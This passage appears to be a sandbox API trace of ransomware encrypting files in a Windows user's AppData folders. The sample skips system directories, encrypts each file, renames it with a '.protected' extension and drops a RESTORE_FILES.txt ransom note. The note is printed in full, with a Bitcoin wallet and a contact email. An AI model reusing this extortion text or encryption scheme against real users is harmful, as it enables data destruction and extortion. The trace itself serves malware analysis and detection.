pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig.protected") returned 122 [0085.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig.protected")) returned 1 [0085.171] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.171] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.xml", lpString2="Windows") returned -1 [0085.171] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.xml", lpString2="Program Files") returned -1 [0085.171] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.xml", lpString2="Program Files (x86)") returned -1 [0085.171] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.xml", lpString2="$Recycle.bin") returned 1 [0085.171] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.xml", lpString2="System Volume Information") returned -1 [0085.171] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml") returned 112 [0085.171] StrStrIW (lpFirst="350db95df4cbd94b2a1c300510e12e11.xml", lpSrch=".protected") returned 0x0 [0085.171] lstrcmpW (lpString1="350db95df4cbd94b2a1c300510e12e11.xml", lpString2="RESTORE_FILES.txt") returned -1 [0085.171] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.171] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml") returned 112 [0085.172] StrStrW (lpFirst="350db95df4cbd94b2a1c300510e12e11.xml", lpSrch=".txt") returned 0x0 [0085.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml") returned 112 [0085.172] StrStrW (lpFirst="350db95df4cbd94b2a1c300510e12e11.xml", lpSrch=".rar") returned 0x0 [0085.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml") returned 112 [0085.172] StrStrW (lpFirst="350db95df4cbd94b2a1c300510e12e11.xml", lpSrch=".zip") returned 0x0 [0085.172] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x7ef, lpOverlapped=0x0) returned 1 [0085.183] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff811, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.183] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x7ef, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x7ef, lpOverlapped=0x0) returned 1 [0085.184] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.184] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.184] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.184] CloseHandle (hObject=0x150) returned 1 [0085.185] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml.protected") returned 122 [0085.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml.protected")) returned 1 [0085.198] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.198] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.198] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\RESTORE_FILES.txt") returned 93 [0085.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.199] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.199] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.200] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.200] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.200] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.200] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.200] CloseHandle (hObject=0x14c) returned 1 [0085.201] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.201] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.201] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\RESTORE_FILES.txt") returned 82 [0085.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.202] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.202] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.202] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.202] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.203] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.203] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0085.203] CloseHandle (hObject=0xd8) returned 1 [0085.203] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.203] lstrcmpiW (lpString1="Outlook", lpString2="Windows") returned -1 [0085.203] lstrcmpiW (lpString1="Outlook", lpString2="Program Files") returned -1 [0085.203] lstrcmpiW (lpString1="Outlook", lpString2="Program Files (x86)") returned -1 [0085.203] lstrcmpiW (lpString1="Outlook", lpString2="$Recycle.bin") returned 1 [0085.203] lstrcmpiW (lpString1="Outlook", lpString2="System Volume Information") returned -1 [0085.203] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook") returned 65 [0085.203] lstrcmpW (lpString1="Outlook", lpString2=".") returned 1 [0085.203] lstrcmpW (lpString1="Outlook", lpString2="..") returned 1 [0085.203] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\*") returned 67 [0085.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0085.204] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.204] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.204] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.204] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.204] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.204] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\.") returned 67 [0085.204] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.204] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.204] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.204] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.204] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.204] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.204] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\..") returned 68 [0085.204] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.204] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.204] lstrcmpiW (lpString1="mapisvc.inf", lpString2="Windows") returned -1 [0085.204] lstrcmpiW (lpString1="mapisvc.inf", lpString2="Program Files") returned -1 [0085.204] lstrcmpiW (lpString1="mapisvc.inf", lpString2="Program Files (x86)") returned -1 [0085.204] lstrcmpiW (lpString1="mapisvc.inf", lpString2="$Recycle.bin") returned 1 [0085.204] lstrcmpiW (lpString1="mapisvc.inf", lpString2="System Volume Information") returned -1 [0085.204] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf") returned 77 [0085.204] StrStrIW (lpFirst="mapisvc.inf", lpSrch=".protected") returned 0x0 [0085.204] lstrcmpW (lpString1="mapisvc.inf", lpString2="RESTORE_FILES.txt") returned -1 [0085.204] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.204] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.205] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf") returned 77 [0085.205] StrStrW (lpFirst="mapisvc.inf", lpSrch=".txt") returned 0x0 [0085.205] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf") returned 77 [0085.205] StrStrW (lpFirst="mapisvc.inf", lpSrch=".rar") returned 0x0 [0085.205] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf") returned 77 [0085.205] StrStrW (lpFirst="mapisvc.inf", lpSrch=".zip") returned 0x0 [0085.205] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x462, lpOverlapped=0x0) returned 1 [0085.207] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffb9e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.207] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x462, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x462, lpOverlapped=0x0) returned 1 [0085.207] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.207] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.207] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.207] CloseHandle (hObject=0x14c) returned 1 [0085.207] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf.protected") returned 87 [0085.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf.protected")) returned 1 [0085.209] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.209] lstrcmpiW (lpString1="Outlook.sharing.xml.obi", lpString2="Windows") returned -1 [0085.209] lstrcmpiW (lpString1="Outlook.sharing.xml.obi", lpString2="Program Files") returned -1 [0085.209] lstrcmpiW (lpString1="Outlook.sharing.xml.obi", lpString2="Program Files (x86)") returned -1 [0085.210] lstrcmpiW (lpString1="Outlook.sharing.xml.obi", lpString2="$Recycle.bin") returned 1 [0085.210] lstrcmpiW (lpString1="Outlook.sharing.xml.obi", lpString2="System Volume Information") returned -1 [0085.210] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi") returned 89 [0085.210] StrStrIW (lpFirst="Outlook.sharing.xml.obi", lpSrch=".protected") returned 0x0 [0085.210] lstrcmpW (lpString1="Outlook.sharing.xml.obi", lpString2="RESTORE_FILES.txt") returned -1 [0085.210] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.210] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi") returned 89 [0085.210] StrStrW (lpFirst="Outlook.sharing.xml.obi", lpSrch=".txt") returned 0x0 [0085.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi") returned 89 [0085.210] StrStrW (lpFirst="Outlook.sharing.xml.obi", lpSrch=".rar") returned 0x0 [0085.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi") returned 89 [0085.210] StrStrW (lpFirst="Outlook.sharing.xml.obi", lpSrch=".zip") returned 0x0 [0085.211] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0xb9, lpOverlapped=0x0) returned 1 [0085.211] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffff47, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.211] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xb9, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0xb9, lpOverlapped=0x0) returned 1 [0085.212] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.212] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.212] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.212] CloseHandle (hObject=0x14c) returned 1 [0085.212] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi.protected") returned 99 [0085.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi.protected" (normalized: "c:\\users\\5p5nrgjn0js 